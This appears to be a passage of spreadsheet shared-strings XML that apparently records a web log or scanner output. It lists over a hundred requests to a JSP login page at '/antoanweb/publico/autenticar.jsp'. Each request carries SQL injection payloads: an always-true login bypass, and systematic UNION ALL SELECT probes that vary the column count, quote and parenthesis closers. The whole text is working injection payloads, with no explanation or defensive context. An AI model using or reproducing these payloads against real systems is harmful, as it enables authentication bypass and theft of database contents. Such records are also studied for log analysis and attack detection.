    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("fxoo"like"fxoo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("jhew"like"jhew</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("cify"like"cify</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("sbvs"like"sbvs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null--and"yxis"like"yxis</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and"ttai"like"ttai</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and"wvfg"like"wvfg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and"ffga"like"ffga</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"lwrm"like"lwrm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"mwjf"like"mwjf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"xvfe"like"xvfe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"kcgl"like"kcgl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"fxys"like"fxys</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and"fyri"like"fyri</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8462,8462,8462,8462,8462,8462,8462,8462,8462,8462,8462--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6217,6217,6217,6217,6217,6217,6217,6217,6217,6217,6217,6217--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9328,9328,9328,9328,9328,9328,9328,9328,9328,9328,9328,9328,9328--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6895,6895,6895,6895,6895,6895,6895,6895,6895,6895,6895,6895,6895,6895--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8706,8706,8706,8706,8706,8706,8706,8706,8706,8706,8706,8706,8706,8706,8706--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7035,7035,7035,7035,7035,7035,7035,7035,7035,7035,7035,7035,7035,7035,7035,7035--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8545,8545,8545,8545,8545,8545,8545,8545,8545,8545,8545,8545,8545,8545,8545,8545,8545--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6406,6406,6406,6406,6406,6406,6406,6406,6406,6406,6406,6406,6406,6406,6406,6406,6406,6406--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384,3384--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149,6149--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8352,8352,8352,8352,8352,8352,8352,8352,8352,8352,8352--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7199,7199,7199,7199,7199,7199,7199,7199,7199,7199,7199,7199--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672,2672--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2688,2688,2688,2688,2688,2688,2688,2688,2688,2688,2688,2688,2688,2688--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4417,4417,4417,4417,4417,4417,4417,4417,4417,4417,4417,4417,4417,4417,4417--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081,1081--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9460,9460,9460,9460,9460,9460,9460,9460,9460,9460,9460,9460,9460,9460,9460,9460,9460--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect721,721,721,721,721,721,721,721,721,721,721,721,721,721,721,721,721,721--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2453,2453,2453,2453,2453,2453,2453,2453,2453,2453,2453,2453,2453,2453,2453,2453,2453,2453,2453--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8669,8669,8669,8669,8669,8669,8669,8669,8669,8669,8669,8669,8669,8669,8669,8669,8669,8669,8669,8669--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect697,697,697,697,697,697,697,697,697,697,697--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3288,3288,3288,3288,3288,3288,3288,3288,3288,3288,3288,3288--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2201,2201,2201,2201,2201,2201,2201,2201,2201,2201,2201,2201,2201--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4447,4447,4447,4447,4447,4447,4447,4447,4447,4447,4447,4447,4447,4447--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect140,140,140,140,140,140,140,140,140,140,140,140,140,140,140--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1138,1138,1138,1138,1138,1138,1138,1138,1138,1138,1138,1138,1138,1138,1138,1138--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9371,9371,9371,9371,9371,9371,9371,9371,9371,9371,9371,9371,9371,9371,9371,9371,9371--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9022,9022,9022,9022,9022,9022,9022,9022,9022,9022,9022,9022,9022,9022,9022,9022,9022,9022--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1419,1419,1419,1419,1419,1419,1419,1419,1419,1419,1419,1419,1419,1419,1419,1419,1419,1419,1419--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004,8004--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1744,1744,1744,1744,1744,1744,1744,1744,1744,1744,1744--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2899,2899,2899,2899,2899,2899,2899,2899,2899,2899,2899,2899--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4859,4859,4859,4859,4859,4859,4859,4859,4859,4859,4859,4859,4859,4859--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625,5625--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2121,2121,2121,2121,2121,2121,2121,2121,2121,2121,2121,2121,2121,2121,2121,2121--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5964,5964,5964,5964,5964,5964,5964,5964,5964,5964,5964,5964,5964,5964,5964,5964,5964,5964--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180,8180--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210,210--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9138,9138,9138,9138,9138,9138,9138,9138,9138,9138,9138--and(6314=6314</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8711,8711,8711,8711,8711,8711,8711,8711,8711,8711,8711,8711--and(5054=5054</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6003,6003,6003,6003,6003,6003,6003,6003,6003,6003,6003,6003,6003--and(4395=4395</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9806,9806,9806,9806,9806,9806,9806,9806,9806,9806,9806,9806,9806,9806--and(7760=7760</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2444,2444,2444,2444,2444,2444,2444,2444,2444,2444,2444,2444,2444,2444,2444--and(4507=4507</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3840,3840,3840,3840,3840,3840,3840,3840,3840,3840,3840,3840,3840,3840,3840,3840--and(5964=5964</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176,2176--and(2331=2331</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438--and(7195=7195</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357--and(6394=6394</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect245,245,245,245,245,245,245,245,245,245,245,245,245,245,245,245,245,245,245,245--and(3397=3397</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8705,8705,8705,8705,8705,8705,8705,8705,8705,8705,8705--and((4250=4250</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1758,1758,1758,1758,1758,1758,1758,1758,1758,1758,1758,1758--and((4284=4284</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8591,8591,8591,8591,8591,8591,8591,8591,8591,8591,8591,8591,8591--and((5342=5342</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7380,7380,7380,7380,7380,7380,7380,7380,7380,7380,7380,7380,7380,7380--and((3374=3374</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559,7559--and((5417=5417</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8087,8087,8087,8087,8087,8087,8087,8087,8087,8087,8087,8087,8087,8087,8087,8087--and((8994=8994</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect2736,2736,2736,2736,2736,2736,2736,2736,2736,2736,2736,2736,2736,2736,2736,2736,2736--and((4470=4470</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect4101,4101,4101,4101,4101,4101,4101,4101,4101,4101,4101,4101,4101,4101,4101,4101,4101,4101--and((7375=7375</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5257,5257,5257,5257,5257,5257,5257,5257,5257,5257,5257,5257,5257,5257,5257,5257,5257,5257,5257--and((9979=9979</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835,835--and((8203=8203</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect9689,9689,9689,9689,9689,9689,9689,9689,9689,9689,9689--and(((8367=8367</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6164,6164,6164,6164,6164,6164,6164,6164,6164,6164,6164,6164--and(((9530=9530</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5457,5457,5457,5457,5457,5457,5457,5457,5457,5457,5457,5457,5457--and(((9050=9050</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123,5123--and(((1831=1831</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5409,5409,5409,5409,5409,5409,5409,5409,5409,5409,5409,5409,5409,5409,5409--and(((4136=4136</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect7442,7442,7442,7442,7442,7442,7442,7442,7442,7442,7442,7442,7442,7442,7442,7442--and(((5832=5832</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6810,6810,6810,6810,6810,6810,6810,6810,6810,6810,6810,6810,6810,6810,6810,6810,6810--and(((4279=4279</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect3222,3222,3222,3222,3222,3222,3222,3222,3222,3222,3222,3222,3222,3222,3222,3222,3222,3222--and(((6094=6094</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect3363,3363,3363,3363,3363,3363,3363,3363,3363,3363,3363,3363,3363,3363,3363,3363,3363,3363,3363--and(((7631=7631</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect654,654,654,654,654,654,654,654,654,654,654,654,654,654,654,654,654,654,654,654--and(((9357=9357</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect4926,4926,4926,4926,4926,4926,4926,4926,4926,4926,4926--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9062,9062,9062,9062,9062,9062,9062,9062,9062,9062,9062,9062--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect7860,7860,7860,7860,7860,7860,7860,7860,7860,7860,7860,7860,7860--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect5279,5279,5279,5279,5279,5279,5279,5279,5279,5279,5279,5279,5279,5279--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9583,9583,9583,9583,9583,9583,9583,9583,9583,9583,9583,9583,9583,9583,9583--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect5677,5677,5677,5677,5677,5677,5677,5677,5677,5677,5677,5677,5677,5677,5677,5677--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559,1559--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect877,877,877,877,877,877,877,877,877,877,877,877,877,877,877,877,877,877--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect8444,8444,8444,8444,8444,8444,8444,8444,8444,8444,8444,8444,8444,8444,8444,8444,8444,8444,8444--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect5633,5633,5633,5633,5633,5633,5633,5633,5633,5633,5633,5633,5633,5633,5633,5633,5633,5633,5633,5633--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5656,5656,5656,5656,5656,5656,5656,5656,5656,5656,5656--and('keuv'='keuv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8619,8619,8619,8619,8619,8619,8619,8619,8619,8619,8619,8619--and('myfv'='myfv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1968,1968,1968,1968,1968,1968,1968,1968,1968,1968,1968,1968,1968--and('mmkk'='mmkk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3958,3958,3958,3958,3958,3958,3958,3958,3958,3958,3958,3958,3958,3958--and('btix'='btix</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect463,463,463,463,463,463,463,463,463,463,463,463,463,463,463--and('aebp'='aebp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect648,648,648,648,648,648,648,648,648,648,648,648,648,648,648,648--and('lzwi'='lzwi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1620,1620,1620,1620,1620,1620,1620,1620,1620,1620,1620,1620,1620,1620,1620,1620,1620--and('znoq'='znoq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349,349--and('gqaw'='gqaw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3453,3453,3453,3453,3453,3453,3453,3453,3453,3453,3453,3453,3453,3453,3453,3453,3453,3453,3453--and('erol'='erol</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097,3097--and('ndws'='ndws</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1509,1509,1509,1509,1509,1509,1509,1509,1509,1509,1509--and(('brqc'='brqc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect156,156,156,156,156,156,156,156,156,156,156,156--and(('eqhm'='eqhm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961,4961--and(('utai'='utai</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6629,6629,6629,6629,6629,6629,6629,6629,6629,6629,6629,6629,6629,6629--and(('ixpa'='ixpa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7126,7126,7126,7126,7126,7126,7126,7126,7126,7126,7126,7126,7126,7126,7126--and(('cple'='cple</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2319,2319,2319,2319,2319,2319,2319,2319,2319,2319,2319,2319,2319,2319,2319,2319--and(('vkwz'='vkwz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1424,1424,1424,1424,1424,1424,1424,1424,1424,1424,1424,1424,1424,1424,1424,1424,1424--and(('vxvu'='vxvu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331--and(('nxqt'='nxqt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7417,7417,7417,7417,7417,7417,7417,7417,7417,7417,7417,7417,7417,7417,7417,7417,7417,7417,7417--and(('dnzn'='dnzn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4503,4503,4503,4503,4503,4503,4503,4503,4503,4503,4503,4503,4503,4503,4503,4503,4503,4503,4503,4503--and(('vavd'='vavd</t>
  </si>
  <si>
